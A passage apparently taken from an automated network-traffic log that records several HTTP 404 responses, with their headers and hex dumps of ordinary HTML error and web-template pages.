f0 09 fb 49 3f 8b 09 e7 43 3f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 82 ac 65 79 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afL0D+{`.I)i9s2J8W)y1OEdi6~gErFqQAidf$2i?FQV0SSwBg&LN7^jI?C?bey0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McxfqgrppB%2BBokbwDB1JgvT25Kb4uEajoVzWQqpop4xf%2F%2F9OoXJE2KFy0hbwEVp7YpDDLQctmsWbLsO3BpfL8BmWAy240bWZyn67IL5oWvoAmUXSOa0JD9J2%2FuG9GSHneL62SozRijcf7a4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a9a713a6b0732d9-EWRalt-svc: h2=":443"; ma=60Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 36 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x06k/ was not found on this server.</p></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:20 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Fri, 27 Oct 2023 06:26:05 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:23 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Fri, 27 Oct 2023 06:26:05 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:26 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Fri, 27 Oct 2023 06:26:05 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:28 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Fri, 27 Oct 2023 06:26:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:34 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:37 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73
